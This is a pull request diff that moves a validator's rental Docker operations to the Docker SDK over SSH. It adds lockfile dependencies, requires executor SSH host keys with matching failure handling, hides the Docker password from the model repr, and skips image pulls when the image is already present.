### PR TITLE
DAH-2205: Move rental Docker hot path to SDK over SSH

### DIFF
--- a/neurons/validators/pdm.lock
+++ b/neurons/validators/pdm.lock
@@ -5,7 +5,7 @@
 groups = ["default", "dev"]
 strategy = ["inherit_metadata"]
 lock_version = "4.5.0"
-content_hash = "sha256:887342ee173e6fba344d288cc9dfd7ae8b01154e9d1f172db77b554df636cded"
+content_hash = "sha256:d24a3d057bc9c825d6ab5680ea10aa99d0c5f1c996ac2154060c0ad1bbf4f506"
 
 [[metadata.targets]]
 requires_python = ">=3.11,<3.13"
@@ -298,6 +298,50 @@ files = [
 ]
 
 [[package]]
+name = "bcrypt"
+version = "5.0.0"
+requires_python = ">=3.8"
+summary = "Modern password hashing for your software and your servers"
+groups = ["default"]
+files = [
+    {file = "bcrypt-5.0.0-cp38-abi3-macosx_10_12_universal2.whl", hash = "sha256:fc746432b951e92b58317af8e0ca746efe93e66555f1b40888865ef5bf56446b"},
+    {file = "bcrypt-5.0.0-cp38-abi3-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:c2388ca94ffee269b6038d48747f4ce8df0ffbea43f31abfa18ac72f0218effb"},
+    {file = "bcrypt-5.0.0-cp38-abi3-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:560ddb6ec730386e7b3b26b8b4c88197aaed924430e7b74666a586ac997249ef"},
+    {file = "bcrypt-5.0.0-cp38-abi3-manylinux_2_28_aarch64.whl", hash = "sha256:d79e5c65dcc9af213594d6f7f1fa2c98ad3fc10431e7aa53c176b441943efbdd"},
+    {file = "bcrypt-5.0.0-cp38-abi3-manylinux_2_28_armv7l.manylinux_2_31_armv7l.whl", hash = "sha256:2b732e7d388fa22d48920baa267ba5d97cca38070b69c0e2d37087b381c681fd"},
+    {file = "bcrypt-5.0.0-cp38-abi3-manylinux_2_28_x86_64.whl", hash = "sha256:0c8e093ea2532601a6f686edbc2c6b2ec24131ff5c52f7610dd64fa4553b5464"},
+    {file = "bcrypt-5.0.0-cp38-abi3-manylinux_2_34_aarch64.whl", hash = "sha256:5b1589f4839a0899c146e8892efe320c0fa096568abd9b95593efac50a87cb75"},
+    {file = "bcrypt-5.0.0-cp38-abi3-manylinux_2_34_x86_64.whl", hash = "sha256:89042e61b5e808b67daf24a434d89bab164d4de1746b37a8d173b6b14f3db9ff"},
+    {file = "bcrypt-5.0.0-cp38-abi3-musllinux_1_1_aarch64.whl", hash = "sha256:e3cf5b2560c7b5a142286f69bde914494b6d8f901aaa71e453078388a50881c4"},
+    {file = "bcrypt-5.0.0-cp38-abi3-musllinux_1_1_x86_64.whl", hash = "sha256:f632fd56fc4e61564f78b46a2269153122db34988e78b6be8b32d28507b7eaeb"},
+    {file = "bcrypt-5.0.0-cp38-abi3-musllinux_1_2_aarch64.whl", hash = "sha256:801cad5ccb6b87d1b430f183269b94c24f248dddbbc5c1f78b6ed231743e001c"},
+    {file = "bcrypt-5.0.0-cp38-abi3-musllinux_1_2_x86_64.whl", hash = "sha256:3cf67a804fc66fc217e6914a5635000259fbbbb12e78a99488e4d5ba445a71eb"},
+    {file = "bcrypt-5.0.0-cp38-abi3-win32.whl", hash = "sha256:3abeb543874b2c0524ff40c57a4e14e5d3a66ff33fb423529c88f180fd756538"},
+    {file = "bcrypt-5.0.0-cp38-abi3-win_amd64.whl", hash = "sha256:35a77ec55b541e5e583eb3436ffbbf53b0ffa1fa16ca6782279daf95d146dcd9"},
+    {file = "bcrypt-5.0.0-cp38-abi3-win_arm64.whl", hash = "sha256:cde08734f12c6a4e28dc6755cd11d3bdfea608d93d958fffbe95a7026ebe4980"},
+    {file = "bcrypt-5.0.0-cp39-abi3-macosx_10_12_universal2.whl", hash = "sha256:0c418ca99fd47e9c59a301744d63328f17798b5947b0f791e9af3c1c499c2d0a"},
+    {file = "bcrypt-5.0.0-cp39-abi3-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:ddb4e1500f6efdd402218ffe34d040a1196c072e07929b9820f363a1fd1f4191"},
+    {file = "bcrypt-5.0.0-cp39-abi3-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:7aeef54b60ceddb6f30ee3db090351ecf0d40ec6e2abf41430997407a46d2254"},
+    {file = "bcrypt-5.0.0-cp39-abi3-manylinux_2_28_aarch64.whl", hash = "sha256:f0ce778135f60799d89c9693b9b398819d15f1921ba15fe719acb3178215a7db"},
+    {file = "bcrypt-5.0.0-cp39-abi3-manylinux_2_28_armv7l.manylinux_2_31_armv7l.whl", hash = "sha256:a71f70ee269671460b37a449f5ff26982a6f2ba493b3eabdd687b4bf35f875ac"},
+    {file = "bcrypt-5.0.0-cp39-abi3-manylinux_2_28_x86_64.whl", hash = "sha256:f8429e1c410b4073944f03bd778a9e066e7fad723564a52ff91841d278dfc822"},
+    {file = "bcrypt-5.0.0-cp39-abi3-manylinux_2_34_aarch64.whl", hash = "sha256:edfcdcedd0d0f05850c52ba3127b1fce70b9f89e0fe5ff16517df7e81fa3cbb8"},
+    {file = "bcrypt-5.0.0-cp39-abi3-manylinux_2_34_x86_64.whl", hash = "sha256:611f0a17aa4a25a69362dcc299fda5c8a3d4f160e2abb3831041feb77393a14a"},
+    {file = "bcrypt-5.0.0-cp39-abi3-musllinux_1_1_aarch64.whl", hash = "sha256:db99dca3b1fdc3db87d7c57eac0c82281242d1eabf19dcb8a6b10eb29a2e72d1"},
+    {file = "bcrypt-5.0.0-cp39-abi3-musllinux_1_1_x86_64.whl", hash = "sha256:5feebf85a9cefda32966d8171f5db7e3ba964b77fdfe31919622256f80f9cf42"},
+    {file = "bcrypt-5.0.0-cp39-abi3-musllinux_1_2_aarch64.whl", hash = "sha256:3ca8a166b1140436e058298a34d88032ab62f15aae1c598580333dc21d27ef10"},
+    {file = "bcrypt-5.0.0-cp39-abi3-musllinux_1_2_x86_64.whl", hash = "sha256:61afc381250c3182d9078551e3ac3a41da14154fbff647ddf52a769f588c4172"},
+    {file = "bcrypt-5.0.0-cp39-abi3-win32.whl", hash = "sha256:64d7ce196203e468c457c37ec22390f1a61c85c6f0b8160fd752940ccfb3a683"},
+    {file = "bcrypt-5.0.0-cp39-abi3-win_amd64.whl", hash = "sha256:64ee8434b0da054d830fa8e89e1c8bf30061d539044a39524ff7dec90481e5c2"},
+    {file = "bcrypt-5.0.0-cp39-abi3-win_arm64.whl", hash = "sha256:f2347d3534e76bf50bca5500989d6c1d05ed64b440408057a37673282c654927"},
+    {file = "bcrypt-5.0.0-pp311-pypy311_pp73-manylinux_2_28_aarch64.whl", hash = "sha256:7edda91d5ab52b15636d9c30da87d2cc84f426c72b9dba7a9b4fe142ba11f534"},
+    {file = "bcrypt-5.0.0-pp311-pypy311_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:046ad6db88edb3c5ece4369af997938fb1c19d6a699b9c1b27b0db432faae4c4"},
+    {file = "bcrypt-5.0.0-pp311-pypy311_pp73-manylinux_2_34_aarch64.whl", hash = "sha256:dcd58e2b3a908b5ecc9b9df2f0085592506ac2d5110786018ee5e160f28e0911"},
+    {file = "bcrypt-5.0.0-pp311-pypy311_pp73-manylinux_2_34_x86_64.whl", hash = "sha256:6b8f520b61e8781efee73cba14e3e8c9556ccfb375623f4f97429544734545b4"},
+    {file = "bcrypt-5.0.0.tar.gz", hash = "sha256:f748f7c2d6fd375cc93d3fba7ef4a9e3a092421b8dbf34d8d4dc06be9492dfdd"},
+]
+
+[[package]]
 name = "bitarray"
 version = "3.8.0"
 summary = "efficient arrays of booleans -- C extension"
@@ -517,7 +561,7 @@ version = "2.0.0"
 requires_python = ">=3.9"
 summary = "Foreign Function Interface for Python calling C code."
 groups = ["default"]
-marker = "python_full_version >= \"3.9\" and platform_python_implementation != \"PyPy\""
+marker = "platform_python_implementation != \"PyPy\" and python_version >= \"3.9\""
 dependencies = [
     "pycparser; implementation_name != \"PyPy\"",
 ]
@@ -785,6 +829,38 @@ groups = ["default"]
 files = [
     {file = "decorator-5.2.1-py3-none-any.whl", hash = "sha256:d316bb415a2d9e2d2b3abcc4084c6502fc09240e292cd76a76afc106a1c8e04a"},
     {file = "decorator-5.2.1.tar.gz", hash = "sha256:65f266143752f734b0a7cc83c46f4618af75b8c5911b00ccb61d0ac9b6da0360"},
+]
+
+[[package]]
+name = "docker"
+version = "7.1.0"
+requires_python = ">=3.8"
+summary = "A Python library for the Docker Engine API."
+groups = ["default"]
+dependencies = [
+    "pywin32>=304; sys_platform == \"win32\"",
+    "requests>=2.26.0",
+    "urllib3>=1.26.0",
+]
+files = [
+    {file = "docker-7.1.0-py3-none-any.whl", hash = "sha256:c96b93b7f0a746f9e77d325bcfb87422a3d8bd4f03136ae8a85b37f1898d5fc0"},
+    {file = "docker-7.1.0.tar.gz", hash = "sha256:ad8c70e6e3f8926cb8a92619b832b4ea5299e2831c14284663184e200546fa6c"},
+]
+
+[[package]]
+name = "docker"
+version = "7.1.0"
+extras = ["ssh"]
+requires_python = ">=3.8"
+summary = "A Python library for the Docker Engine API."
+groups = ["default"]
+dependencies = [
+    "docker==7.1.0",
+    "paramiko>=2.4.3",
+]
+files = [
+    {file = "docker-7.1.0-py3-none-any.whl", hash = "sha256:c96b93b7f0a746f9e77d325bcfb87422a3d8bd4f03136ae8a85b37f1898d5fc0"},
+    {file = "docker-7.1.0.tar.gz", hash = "sha256:ad8c70e6e3f8926cb8a92619b832b4ea5299e2831c14284663184e200546fa6c"},
 ]
 
 [[package]]
@@ -1109,6 +1185,17 @@ groups = ["dev"]
 files = [
     {file = "iniconfig-2.3.0-py3-none-any.whl", hash = "sha256:f631c04d2c48c52b84d0d0549c99ff3859c98df65b3101406327ecc7d53fbf12"},
     {file = "iniconfig-2.3.0.tar.gz", hash = "sha256:c76315c77db068650d49c5b56314774a7804df16fee4402c1f19d6d15d8c4730"},
+]
+
+[[package]]
+name = "invoke"
+version = "3.0.3"
+requires_python = ">=3.9"
+summary = "Pythonic task execution"
+groups = ["default"]
+files = [
+    {file = "invoke-3.0.3-py3-none-any.whl", hash = "sha256:f11327165e5cbb89b2ad1d88d3292b5113332c43b8553b494da435d6ec6f5053"},
+    {file = "invoke-3.0.3.tar.gz", hash = "sha256:437b6a622223824380bfb4e64f612711a6b648c795f565efc8625af66fb57f0c"},
 ]
 
 [[package]]
@@ -1500,6 +1587,23 @@ files = [
 ]
 
 [[package]]
+name = "paramiko"
+version = "5.0.0"
+requires_python = ">=3.9"
+summary = "SSH2 protocol library"
+groups = ["default"]
+dependencies = [
+    "bcrypt>=3.2",
+    "cryptography>=3.3",
+    "invoke>=2.0",
+    "pynacl>=1.5",
+]
+files = [
+    {file = "paramiko-5.0.0-py3-none-any.whl", hash = "sha256:b7044611c30140d9a75261653210e2002977b71a0497ff3ba0d98d7edbf62f7c"},
+    {file = "paramiko-5.0.0.tar.gz", hash = "sha256:36763b5b95c2a0dcfdf1abc48e48156ee425b21efe2f0e787c2dd5a95c0e5e79"},
+]
+
+[[package]]
 name = "parsimonious"
 version = "0.10.0"
 summary = "(Soon to be) the fastest pure-Python PEG parser I could muster"
@@ -1767,7 +1871,7 @@ version = "3.0"
 requires_python = ">=3.10"
 summary = "C parser in Python"
 groups = ["default"]
-marker = "python_full_version >= \"3.9\" and platform_python_implementation != \"PyPy\" and implementation_name != \"PyPy\""
+marker = "platform_python_implementation != \"PyPy\" and python_version >= \"3.9\" and implementation_name != \"PyPy\""
 files = [
     {file = "pycparser-3.0-py3-none-any.whl", hash = "sha256:b727414169a36b7d524c1c3e31839a521725078d7b2ff038656844266160a992"},
     {file = "pycparser-3.0.tar.gz", hash = "sha256:600f49d217304a5902ac3c37e1281c9fe94e4d0489de643a9504c5cdfdfc6b29"},
@@ -1935,6 +2039,32 @@ files = [
 ]
 
 [[package]]
+name = "pynacl"
+version = "1.6.2"
+requires_python = ">=3.8"
+summary = "Python binding to the Networking and Cryptography (NaCl) library"
+groups = ["default"]
+dependencies = [
+    "cffi>=1.4.1; platform_python_implementation != \"PyPy\" and python_version < \"3.9\"",
+    "cffi>=2.0.0; platform_python_implementation != \"PyPy\" and python_version >= \"3.9\"",
+]
+files = [
+    {file = "pynacl-1.6.2-cp38-abi3-macosx_10_10_universal2.whl", hash = "sha256:c949ea47e4206af7c8f604b8278093b674f7c79ed0d4719cc836902bf4517465"},
+    {file = "pynacl-1.6.2-cp38-abi3-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:8845c0631c0be43abdd865511c41eab235e0be69c81dc66a50911594198679b0"},
+    {file = "pynacl-1.6.2-cp38-abi3-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:22de65bb9010a725b0dac248f353bb072969c94fa8d6b1f34b87d7953cf7bbe4"},
+    {file = "pynacl-1.6.2-cp38-abi3-manylinux_2_26_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:46065496ab748469cdd999246d17e301b2c24ae2fdf739132e580a0e94c94a87"},
+    {file = "pynacl-1.6.2-cp38-abi3-manylinux_2_26_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:8a66d6fb6ae7661c58995f9c6435bda2b1e68b54b598a6a10247bfcdadac996c"},
+    {file = "pynacl-1.6.2-cp38-abi3-manylinux_2_34_aarch64.whl", hash = "sha256:26bfcd00dcf2cf160f122186af731ae30ab120c18e8375684ec2670dccd28130"},
+    {file = "pynacl-1.6.2-cp38-abi3-manylinux_2_34_x86_64.whl", hash = "sha256:c8a231e36ec2cab018c4ad4358c386e36eede0319a0c41fed24f840b1dac59f6"},
+    {file = "pynacl-1.6.2-cp38-abi3-musllinux_1_2_aarch64.whl", hash = "sha256:68be3a09455743ff9505491220b64440ced8973fe930f270c8e07ccfa25b1f9e"},
+    {file = "pynacl-1.6.2-cp38-abi3-musllinux_1_2_x86_64.whl", hash = "sha256:8b097553b380236d51ed11356c953bf8ce36a29a3e596e934ecabe76c985a577"},
+    {file = "pynacl-1.6.2-cp38-abi3-win32.whl", hash = "sha256:5811c72b473b2f38f7e2a3dc4f8642e3a3e9b5e7317266e4ced1fba85cae41aa"},
+    {file = "pynacl-1.6.2-cp38-abi3-win_amd64.whl", hash = "sha256:62985f233210dee6548c223301b6c25440852e13d59a8b81490203c3227c5ba0"},
+    {file = "pynacl-1.6.2-cp38-abi3-win_arm64.whl", hash = "sha256:834a43af110f743a754448463e8fd61259cd4ab5bbedcf70f9dabad1d28a394c"},
+    {file = "pynacl-1.6.2.tar.gz", hash = "sha256:018494d6d696ae03c7e656e5e74cdfd8ea1326962cc401bcf018f1ed8436811c"},
+]
+
+[[package]]
 name = "pytest"
 version = "9.0.2"
 requires_python = ">=3.10"
@@ -2036,7 +2166,7 @@ name = "pywin32"
 version = "311"
 summary = "Python for Window Extensions"
 groups = ["default"]
-marker = "platform_system == \"Windows\""
+marker = "sys_platform == \"win32\" or platform_system == \"Windows\""
 files = [
     {file = "pywin32-311-cp311-cp311-win32.whl", hash = "sha256:184eb5e436dea364dcd3d2316d577d625c0351bf237c4e9a5fabbcfa5a58b151"},
     {file = "pywin32-311-cp311-cp311-win_amd64.whl", hash = "sha256:3ce80b34b22b17ccbd937a6e78e7225d80c52f5ab9940fe0506a1a16f3dab503"},

--- a/neurons/validators/pyproject.toml
+++ b/neurons/validators/pyproject.toml
@@ -32,6 +32,7 @@ dependencies = [
     "tenacity>=9.1.2",
     "uvicorn>=0.35.0",
     "asyncpg>=0.30.0",
+    "docker[ssh]>=7.1.0",
 ]
 requires-python = "<3.13,>=3.11"
 readme = "README.md"

--- a/neurons/validators/src/payload_models/payloads.py
+++ b/neurons/validators/src/payload_models/payloads.py
@@ -3,7 +3,7 @@ from datetime import datetime
 
 from datura.requests.base import BaseRequest
 from datura.requests.miner_requests import PodLog
-from pydantic import BaseModel, field_validator, model_serializer
+from pydantic import BaseModel, Field, field_validator, model_serializer
 
 
 class CustomOptions(BaseModel):
@@ -252,7 +252,8 @@ class ContainerCreateRequest(ContainerBaseRequest):
     external_volume_info: ExternalVolumeInfo | None = None
     is_sysbox: bool | None = None
     docker_username: str | None = None  # when edit pod, docker_username is required
-    docker_password: str | None = None  # when edit pod, docker_password is required
+    # when edit pod, docker_password is required
+    docker_password: str | None = Field(default=None, repr=False)
     timestamp: int | None = None
     backup_log_id: str | None = None
     restore_path: str | None = None

--- a/neurons/validators/src/payload_models/payloads.py
+++ b/neurons/validators/src/payload_models/payloads.py
@@ -263,7 +263,7 @@ class ContainerCreateRequest(ContainerBaseRequest):
     active_volume_names: list[str] | None = None
     # DAH-2211 (custom-dockerfile pod): when present and non-empty the validator
     # builds the image from this Dockerfile on the executor host instead of pulling
-    # `docker_image`. None or "" preserves the existing pull path byte-identically.
+    # `docker_image`. None or "" keeps the normal image-pull path.
     dockerfile_content: str | None = None
     # DAH-1524 (cached-template deploy): when truthy, the validator skips the
     # ENTIRE post-creation sshd bootstrap (install_open_ssh_server_and_start_ssh_service

--- a/neurons/validators/src/services/docker_service.py
+++ b/neurons/validators/src/services/docker_service.py
@@ -74,6 +74,7 @@ from services.rental_docker_sdk import (
     DEFAULT_DOCKER_PULL_TIMEOUT_SECONDS,
     DeviceMount,
     PortBinding,
+    RentalDockerConnectionError,
     RentalDockerSdkClient,
     RentalDockerSdkClientFactory,
     VolumeMount,
@@ -81,6 +82,7 @@ from services.rental_docker_sdk import (
     build_container_command_argv,
     build_environment_exec_spec,
     build_remove_authorized_keys_exec_spec,
+    require_rental_docker_ssh_host_key,
 )
 from services.ssh_service import SSHService
 
@@ -135,6 +137,18 @@ _CREATE_CONTAINER_SSH_KEEPALIVE_INTERVAL_SEC = 30
 _CREATE_CONTAINER_SSH_KEEPALIVE_COUNT_MAX = 4
 _DOCKER_PULL_TIMEOUT_SECONDS = DEFAULT_DOCKER_PULL_TIMEOUT_SECONDS
 _INSPECTOR_LIFECYCLE_TIMEOUT_SECONDS = 30
+
+
+def _missing_rental_docker_host_key_log_text(
+    default_extra: dict[str, Any],
+    exc: RentalDockerConnectionError,
+):
+    return _m(
+        "Missing executor SSH host key for rental Docker SDK operation",
+        extra=get_extra_info({**default_extra, **HOST_KEY_REQUIRED_EXTRA, "error": str(exc)}),
+    )
+
+
 # DAH-2183: fresh vloopback sizing — compute effective volume/storage limits
 # from on-host disk state when the backend sends disk_share.
 _FRESH_SIZING_OVERHEAD_GB = 20   # reserved for system/docker overhead when reconstructing the pool
@@ -2833,6 +2847,10 @@ class DockerService:
                     failure_step=current_step,
                 )
 
+            current_step = "docker_sdk_ssh_host_key"
+            # Keep this immediately before the guard; the broad except uses it as failure_step.
+            require_rental_docker_ssh_host_key(executor_info)
+
             current_step = "ssh_connect"
             async with (
                 asyncssh.connect(
@@ -3426,13 +3444,19 @@ class DockerService:
             await self.redis_service.remove_pending_pod(payload.miner_hotkey, payload.executor_id, payload.pod_id)
 
             # Port release now handled by backend
+            failure_msg = str(log_text)
+            if (
+                current_step == "docker_sdk_ssh_host_key"
+                and isinstance(e, RentalDockerConnectionError)
+            ):
+                failure_msg = f"{failure_msg}: {e}"
 
             return FailedContainerRequest(
                 miner_hotkey=payload.miner_hotkey,
                 executor_id=payload.executor_id,
                 pod_id=payload.pod_id,
                 workload_kind=payload.workload_kind,
-                msg=str(log_text),
+                msg=failure_msg,
                 error_type=FailedContainerErrorTypes.ContainerCreationFailed,
                 error_code=FailedContainerErrorCodes.UnknownError,
                 failure_step=current_step,
@@ -3483,6 +3507,21 @@ class DockerService:
                 "Attestation failed",
                 extra=get_extra_info({**default_extra, "error": str(exc)}),
             )
+            logger.error(log_text)
+            return FailedContainerRequest(
+                miner_hotkey=payload.miner_hotkey,
+                executor_id=payload.executor_id,
+                pod_id=payload.pod_id,
+                workload_kind=payload.workload_kind,
+                msg=str(log_text),
+                error_type=FailedContainerErrorTypes.ContainerStopFailed,
+                error_code=FailedContainerErrorCodes.UnknownError,
+            )
+
+        try:
+            require_rental_docker_ssh_host_key(executor_info)
+        except RentalDockerConnectionError as exc:
+            log_text = _missing_rental_docker_host_key_log_text(default_extra, exc)
             logger.error(log_text)
             return FailedContainerRequest(
                 miner_hotkey=payload.miner_hotkey,
@@ -3572,6 +3611,21 @@ class DockerService:
                 "Attestation failed",
                 extra=get_extra_info({**default_extra, "error": str(exc)}),
             )
+            logger.error(log_text)
+            return FailedContainerRequest(
+                miner_hotkey=payload.miner_hotkey,
+                executor_id=payload.executor_id,
+                pod_id=payload.pod_id,
+                workload_kind=payload.workload_kind,
+                msg=str(log_text),
+                error_type=FailedContainerErrorTypes.ContainerStartFailed,
+                error_code=FailedContainerErrorCodes.UnknownError,
+            )
+
+        try:
+            require_rental_docker_ssh_host_key(executor_info)
+        except RentalDockerConnectionError as exc:
+            log_text = _missing_rental_docker_host_key_log_text(default_extra, exc)
             logger.error(log_text)
             return FailedContainerRequest(
                 miner_hotkey=payload.miner_hotkey,
@@ -3706,6 +3760,21 @@ class DockerService:
                 "Attestation failed",
                 extra=get_extra_info({**default_extra, "error": str(exc)}),
             )
+            logger.error(log_text)
+            return FailedContainerRequest(
+                miner_hotkey=payload.miner_hotkey,
+                executor_id=payload.executor_id,
+                pod_id=payload.pod_id,
+                workload_kind=payload.workload_kind,
+                msg=str(log_text),
+                error_type=FailedContainerErrorTypes.ContainerDeletionFailed,
+                error_code=FailedContainerErrorCodes.UnknownError,
+            )
+
+        try:
+            require_rental_docker_ssh_host_key(executor_info)
+        except RentalDockerConnectionError as exc:
+            log_text = _missing_rental_docker_host_key_log_text(default_extra, exc)
             logger.error(log_text)
             return FailedContainerRequest(
                 miner_hotkey=payload.miner_hotkey,
@@ -4018,28 +4087,43 @@ class DockerService:
                 error_code=FailedContainerErrorCodes.UnknownError,
             )
 
+        if not payload.user_public_keys:
+            log_text = _m(
+                "ssh key Remove error: no public key",
+                extra=get_extra_info({
+                    **default_extra,
+                    "container_name": payload.container_name,
+                    "error": "No public keys",
+                }),
+            )
+            logger.error(log_text)
+
+            return FailedContainerRequest(
+                miner_hotkey=payload.miner_hotkey,
+                executor_id=payload.executor_id,
+                pod_id=payload.pod_id,
+                workload_kind=payload.workload_kind,
+                msg=str(log_text),
+                error_type=FailedContainerErrorTypes.AddSSkeyFailed,
+                error_code=FailedContainerErrorCodes.NoSshKeys,
+            )
+
         try:
-            if not payload.user_public_keys:
-                log_text = _m(
-                    "ssh key Remove error: no public key",
-                    extra=get_extra_info({
-                        **default_extra,
-                        "container_name": payload.container_name,
-                        "error": "No public keys",
-                    }),
-                )
-                logger.error(log_text)
+            require_rental_docker_ssh_host_key(executor_info)
+        except RentalDockerConnectionError as exc:
+            log_text = _missing_rental_docker_host_key_log_text(default_extra, exc)
+            logger.error(log_text)
+            return FailedContainerRequest(
+                miner_hotkey=payload.miner_hotkey,
+                executor_id=payload.executor_id,
+                pod_id=payload.pod_id,
+                workload_kind=payload.workload_kind,
+                msg=str(log_text),
+                error_type=FailedContainerErrorTypes.AddSSkeyFailed,
+                error_code=FailedContainerErrorCodes.UnknownError,
+            )
 
-                return FailedContainerRequest(
-                    miner_hotkey=payload.miner_hotkey,
-                    executor_id=payload.executor_id,
-                    pod_id=payload.pod_id,
-                    workload_kind=payload.workload_kind,
-                    msg=str(log_text),
-                    error_type=FailedContainerErrorTypes.AddSSkeyFailed,
-                    error_code=FailedContainerErrorCodes.NoSshKeys,
-                )
-
+        try:
             async with self.rental_docker_client_factory.connect(
                 executor_info=executor_info,
                 private_key=private_key,
@@ -4136,28 +4220,43 @@ class DockerService:
                 error_code=FailedContainerErrorCodes.UnknownError,
             )
 
+        if not payload.user_public_keys:
+            log_text = _m(
+                "ssh key Add error: no public key",
+                extra=get_extra_info({
+                    **default_extra,
+                    "container_name": payload.container_name,
+                    "error": "No public keys",
+                }),
+            )
+            logger.error(log_text)
+
+            return FailedContainerRequest(
+                miner_hotkey=payload.miner_hotkey,
+                executor_id=payload.executor_id,
+                pod_id=payload.pod_id,
+                workload_kind=payload.workload_kind,
+                msg=str(log_text),
+                error_type=FailedContainerErrorTypes.AddSSkeyFailed,
+                error_code=FailedContainerErrorCodes.NoSshKeys,
+            )
+
         try:
-            if not payload.user_public_keys:
-                log_text = _m(
-                    "ssh key Add error: no public key",
-                    extra=get_extra_info({
-                        **default_extra,
-                        "container_name": payload.container_name,
-                        "error": "No public keys",
-                    }),
-                )
-                logger.error(log_text)
+            require_rental_docker_ssh_host_key(executor_info)
+        except RentalDockerConnectionError as exc:
+            log_text = _missing_rental_docker_host_key_log_text(default_extra, exc)
+            logger.error(log_text)
+            return FailedContainerRequest(
+                miner_hotkey=payload.miner_hotkey,
+                executor_id=payload.executor_id,
+                pod_id=payload.pod_id,
+                workload_kind=payload.workload_kind,
+                msg=str(log_text),
+                error_type=FailedContainerErrorTypes.AddSSkeyFailed,
+                error_code=FailedContainerErrorCodes.UnknownError,
+            )
 
-                return FailedContainerRequest(
-                    miner_hotkey=payload.miner_hotkey,
-                    executor_id=payload.executor_id,
-                    pod_id=payload.pod_id,
-                    workload_kind=payload.workload_kind,
-                    msg=str(log_text),
-                    error_type=FailedContainerErrorTypes.AddSSkeyFailed,
-                    error_code=FailedContainerErrorCodes.NoSshKeys,
-                )
-
+        try:
             async with self.rental_docker_client_factory.connect(
                 executor_info=executor_info,
                 private_key=private_key,

--- a/neurons/validators/src/services/docker_service.py
+++ b/neurons/validators/src/services/docker_service.py
@@ -2911,22 +2911,57 @@ class DockerService:
                     profilers.append(ProfilerStep.since(ProfilerStepName.CUSTOM_DOCKER_BUILD, prev_timestamp))
                     prev_timestamp = now_ms()
                 else:
-                    current_step = "docker_pull"
-                    await self.stream_log(
-                        f"Pulling docker image {payload.docker_image}",
-                        "success",
-                        log_tag,
-                    )
-                    await run_logged_rental_docker_sdk_operation(
-                        operation="pull",
-                        log_extra=default_extra,
-                        call=lambda: docker_client.pull(image=payload.docker_image),
-                        image=payload.docker_image,
-                    )
+                    current_step = "docker_image_inspect"
+                    image_present = False
+                    try:
+                        image_present = await run_logged_rental_docker_sdk_operation(
+                            operation="inspect_image",
+                            log_extra=default_extra,
+                            call=lambda: docker_client.image_exists(
+                                image=payload.docker_image
+                            ),
+                            image=payload.docker_image,
+                        )
+                    except Exception as exc:
+                        logger.warning(
+                            _m(
+                                "Docker SDK image inspect probe failed; falling back to pull",
+                                extra=get_extra_info({**default_extra, "error": str(exc)}),
+                            )
+                        )
 
-                    # Add profiler for docker pull
-                    profilers.append(ProfilerStep.since(ProfilerStepName.DOCKER_PULL, prev_timestamp))
-                    prev_timestamp = now_ms()
+                    current_step = "docker_pull"
+                    if image_present:
+                        logger.info(
+                            _m(
+                                "Skipping docker pull; image already present locally",
+                                extra=get_extra_info(default_extra),
+                            )
+                        )
+                        profilers.append(
+                            ProfilerStep.since(
+                                ProfilerStepName.DOCKER_PULL,
+                                prev_timestamp,
+                                skipped=True,
+                            )
+                        )
+                        prev_timestamp = now_ms()
+                    else:
+                        await self.stream_log(
+                            f"Pulling docker image {payload.docker_image}",
+                            "success",
+                            log_tag,
+                        )
+                        await run_logged_rental_docker_sdk_operation(
+                            operation="pull",
+                            log_extra=default_extra,
+                            call=lambda: docker_client.pull(image=payload.docker_image),
+                            image=payload.docker_image,
+                        )
+
+                        # Add profiler for docker pull
+                        profilers.append(ProfilerStep.since(ProfilerStepName.DOCKER_PULL, prev_timestamp))
+                        prev_timestamp = now_ms()
 
                 # Get the container path from the first volume
                 local_volume_path = custom_options.volumes[0].split(':')[-1] if custom_options.volumes else '/root'

--- a/neurons/validators/src/services/docker_service.py
+++ b/neurons/validators/src/services/docker_service.py
@@ -71,6 +71,7 @@ from services.rental_docker_observability import (
 from services.rental_docker_sdk import (
     ContainerExecSpec,
     ContainerRunSpec,
+    DEFAULT_DOCKER_PULL_TIMEOUT_SECONDS,
     DeviceMount,
     PortBinding,
     RentalDockerSdkClient,
@@ -124,11 +125,15 @@ _LOCAL_VOLUME_TIMEOUT_GB_PER_SEC = 10
 _LOCAL_VOLUME_TIMEOUT_MAX_SEC = 180
 _FILLER_EXTERNAL_PORT_OFFSET = 20
 _DOCKER_NO_SUCH_CONTAINER_PHRASE = "No such container"
+HOST_KEY_REQUIRED_EXTRA = {
+    "ssh_host_key_missing": True,
+    "docker_sdk_host_key_required": True,
+}
 # Keep the rental create_container SSH session alive while long docker pulls
 # are quiet. With 30s/4, AsyncSSH declares a dead peer after about 2 minutes.
 _CREATE_CONTAINER_SSH_KEEPALIVE_INTERVAL_SEC = 30
 _CREATE_CONTAINER_SSH_KEEPALIVE_COUNT_MAX = 4
-_DOCKER_PULL_TIMEOUT_SECONDS = 3 * 60 * 60 # 3 hours
+_DOCKER_PULL_TIMEOUT_SECONDS = DEFAULT_DOCKER_PULL_TIMEOUT_SECONDS
 _INSPECTOR_LIFECYCLE_TIMEOUT_SECONDS = 30
 # DAH-2183: fresh vloopback sizing — compute effective volume/storage limits
 # from on-host disk state when the backend sends disk_share.
@@ -253,7 +258,10 @@ class DockerService:
         self.redis_service = redis_service
         self.attestation_service = attestation_service
         self.rental_docker_client_factory = (
-            rental_docker_client_factory or RentalDockerSdkClientFactory()
+            rental_docker_client_factory
+            or RentalDockerSdkClientFactory(
+                pull_timeout_seconds=_DOCKER_PULL_TIMEOUT_SECONDS,
+            )
         )
         self.lock = asyncio.Lock()
         self.logs_queue: list[dict] = []
@@ -3294,13 +3302,15 @@ class DockerService:
 
                     # add environment variables
                     current_step = "set_environment"
-                    await self.add_environment_variables_with_rental_docker(
+                    environment_ok = await self.add_environment_variables_with_rental_docker(
                         docker_client=docker_client,
                         container_name=container_name,
                         environment=custom_options.environment if custom_options else None,
                         log_tag=log_tag,
                         log_extra=default_extra,
                     )
+                    if not environment_ok:
+                        raise RuntimeError("Failed to set environment variables")
 
                     # Add profiler for adding public keys
